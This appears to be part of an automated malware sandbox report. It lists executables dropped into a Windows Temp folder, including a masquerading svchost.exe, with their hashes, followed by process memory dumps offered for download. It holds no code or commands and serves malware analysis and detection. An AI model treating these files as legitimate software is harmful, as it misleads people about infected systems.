\Users\Admin\AppData\Local\Temp\Files\MajesticExec.exe

Filesize
12.0MB

MD5
1963ce8f3f680d344d195bc27449b9a7

SHA1
2e6003b291dd2ffde77487be166536f63c66c672

SHA256
46d936bdc8ae3c40d119eec506b3a8aef4f6b97d10207fe4768692c3e887d082

SHA512
fb628ec38dc1e477fd90059b7a5901b0a76b43cb3bdebab38f50d85657385668323a97206769ca73028c94b9ee053a483828ce0a56a032bed2c3f5848b7025a0

Download Submit
\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE

Filesize
105KB

MD5
35ec5f7d35646a1e5bca50612a9c71da

SHA1
ac88c3a476f44f85448fb129c3513ac16540df9f

SHA256
be57f5aa448ce0c6834a7476b32c4279d7be20c16d1bdfa92ef755542c334dce

SHA512
f609961769b135d2c62c0fac10bacf37cc49c73630e905738577310e4765fff49f28e381747b85daf559de1c2a42cff62da638642f000b7eca2d91a01f370b5f

Download Submit
\Users\Admin\AppData\Local\Temp\Files\jeditor.exe

Filesize
249KB

MD5
0a93ce89508f3b14786ae1f45759742b

SHA1
caa7f7e1faf7fe9f8918b4c7b26311543c48d9e3

SHA256
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc

SHA512
8fd93ea771babac318ce06f11868a087797bf2ffc216d2c783ec00ac3f3e6948029b64c55c8323cd1a957d5f49ebbae9890accfb27af9de639be2709bb6fddf5

Download Submit
\Users\Admin\AppData\Local\Temp\Files\skibidi.exe

Filesize
3.1MB

MD5
5c73e901190eb50c2794a879a354417d

SHA1
e7e0e5552b9656e3790aa748f9af8774b606ed66

SHA256
7ccfce0efe92cb5edd40257ce119bc91b50012c8081cb639aad6caab663a3ff6

SHA512
fc3bb5c1c6b2917e6169cfc7633f91335eda82c68518f801e26805fc6381afb54508dbc689eb7c946ebe5e6195b37daa1639243e3fef3ee2073dbb1aa8495fd6

Download Submit
\Users\Admin\AppData\Local\Temp\Files\svchost.exe

Filesize
2.7MB

MD5
92c75c7eeb885c33599830c4dc54fed6

SHA1
c678706be1f3f9043ec4ecb1124999a0299ff8f4

SHA256
9839824613ddb8e89ac5ee022058ac7c2950252692757767d10a94ff8d5d958b

SHA512
a6a51275187c9b8d50639b0f82b475b8b80c656e6643f5809f9bac267b855c39821a76c8c1226b0dc21a98af1fe7a1219d0d27e58b945cd0d7636bb37d497248

Download Submit
\Users\Admin\AppData\Local\Temp\Files\temp.exe

Filesize
48KB

MD5
dfeaafa71cc4f33a546b050aefb83519

SHA1
3b34503a035774a83927fb5fc99a060c84e9b9e9

SHA256
d94acc2a29273419227c070be66a652e5d074de175d0ec572bf9dee2f833703f

SHA512
70c9ea4f9ee001648d85e11c6b6bc316b83c29866b97cb60fe2dc8f0994a721dcc77d9930020e5bbd19cab53a58cdf13c9af8d2f46d8e492d5e8e28d4c6763d4

Download Submit
memory/444-4946-0x0000000001200000-0x0000000001218000-memory.dmp

Filesize
96KB

Download
memory/552-421-0x0000000006DC0000-0x00000000079C5000-memory.dmp

Filesize
12.0MB

Download
memory/552-369-0x0000000006DC0000-0x00000000079C5000-memory.dmp

Filesize
12.0MB

Download
memory/552-27-0x0000000000360000-0x0000000000368000-memory.dmp

Filesize
32KB

Download
memory/596-497-0x00000000004B0000-0x00000000004D9000-memory.dmp

Filesize
164KB

Download
memory/756-589-0x000007FEED960000-0x000007FEEDDC5000-memory.dmp

Filesize
4.4MB

Download
memory/1412-544-0x0000000000960000-0x0000000000C84000-memory.dmp

Filesize
3.1MB

Download
memory/1464-465-0x0000000000110000-0x0000000000434000-memory.dmp

Filesize
3.1MB

Download
memory/1472-1407-0x0000000001140000-0x0000000001464000-memory.dmp

Filesize
3.1MB

Download
memory/1500-955-0x000007FEEB010000-0x000007FEEB475000-memory.dmp

Filesize
4.4MB

Download
memory/1532-1087-0x000007FEEA730000-0x000007FEEAB95000-memory.dmp

Filesize
4.4MB

Download
memory/1556-39-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1700-5823-0x0000000000190000-0x00000000004B4000-memory.dmp

Filesize
3.1MB

Download
memory/1700-661-0x000007FEEBD60000-0x000007FEEC1C5000-memory.dmp

Filesize
4.4MB

Download
memory/1772-1617-0x000007FEE82F0000-0x000007FEE8755000-memory.dmp

Filesize
4.4MB

Download
memory/1860-392-0x0000000001190000-0x00000000011A2000-memory.dmp

Filesize
72KB

Download
memory/1908-384-0x00000000009F0000-0x0000000000D14000-memory.dmp

Filesize
3.1MB

Download
memory/1948-2141-0x0000000000460000-0x00000000004AB000-memory.dmp

Filesize
300KB

Download
memory/1960-1272-0x000007FEE9E50000-0x000007FEEA2B5000-memory.dmp

Filesize
4.4MB

Download
memory/2020-1153-0x000007FEEA2C0000-0x000007FEEA725000-memory.dmp

Filesize
4.4MB

Download
memory/2036-674-0x0000000000E30000-0x0000000001154000-memory.dmp

Filesize
3.1MB

Download
memory/2036-1684-0x000007FEE7E80000-0x000007FEE82E5000-memory.dmp

Filesize
4.4MB

Download
memory/2216-1549-0x000007FEE8860000-0x000007FEE8CC5000-memory.dmp

Filesize
4.4MB

Download
memory/2284-889-0x000007FEEB480000-0x000007FEEB8E5000-memory.dmp

Filesize
4.4MB

Download
memory/2316-426-0x0000000000160000-0x0000000000172000-memory.dmp

Filesize
72KB

Download
memory/2356-482-0x0000000000B40000-0x0000000000B9E000-memory.dmp

Filesize
376KB

Download
memory/2376-439-0x0000000001130000-0x0000000001454000-memory.dmp

Filesize
3.1MB

Download
memory/2404-309-0x0000000000350000-0x0000000000362000-memory.dmp

Filesize
72KB

Download
memory/2452-1021-0x000007FEEABA0000-0x000007FEEB005000-memory.dmp

Filesize
4.4MB

Download
memory/2500-1339-0x000007FEE98E0000-0x000007FEE9D45000-memory.dmp

Filesize
4.4MB

Download
memory/2596-38-0x0000000000A70000-0x0000000000A78000-memory.dmp

Filesize
32KB

Download
memory/2612-1474-0x000007FEE8CD0000-0x000007FEE9135000-memory.dmp

Filesize
4.4MB

Download
memory/2624-394-0x000000013F0E0000-0x000000013FCE5000-memory.dmp

Filesize
12.0MB

Download
memory/2624-370-0x000000013F0E0000-0x000000013FCE5000-memory.dmp

Filesize
12.0MB

Download
memory/2656-296-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/2656-1338-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/2760-0-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/2760-26-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/2780-493-0x0000000077870000-0x0000000077872000-memory.dmp

Filesize
8KB

Download
memory/2780-489-0x0000000077870000-0x0000000077872000-memory.dmp

Filesize
8KB

Download
memory/2780-491-0x0000000077870000-0x0000000077872000-memory.dmp

Filesize
8KB

Download
memory/2780-494-0x000000013F540000-0x000000013FAE3000-memory.dmp

Filesize
5.6MB

Download
memory/2792-400-0x0000000000E50000-0x0000000001174000-memory.dmp

Filesize
3.1MB

Download
memory/2824-2209-0x0000000001150000-0x0000000001474000-memory.dmp

Filesize
3.1MB

Download
memory/2840-1406-0x000007FEE9370000-0x000007FEE97D5000-memory.dmp

Filesize
4.4MB

Download
memory/2908-295-0x0000000000B40000-0x0000000000B52000-memory.dmp

Filesize
72KB

Download
memory/2924-821-0x000007FEEB8F0000-0x000007FEEBD55000-memory.dmp

Filesize
4.4MB

Download
memory/3068-1751-0x000007FEE7A10000-0x000007FEE7E75000-memory.dmp

Filesize
4.4MB

Download
memory/3304-4931-0x0000000005A70000-0x0000000005D94000-memory.dmp

Filesize
3.1MB

Download
memory/3620-3143-0x00000000003C0000-0x00000000003D2000-memory.dmp

Filesize
72KB

Download
memory/3784-5216-0x00000000029E0000-0x00000000029E8000-memory.dmp

Filesize
32KB

Download
memory/3784-5215-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/4152-5690-0x0000000000E60000-0x0000000000E78000-memory.dmp

Filesize
96KB

Download
memory/4164-5222-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/4164-5223-0x0000000002850000-0x0000000002858000-memory.dmp

Filesize
32KB

Download
memory/4276-5071-0x0000000000380000-0x00000000006A4000-memory.dmp

Filesize
3.1MB

Download
memory/5064-6555-0x00000000011C0000-0x00000000014E4000-memory.dmp

Filesize
3.1MB

Download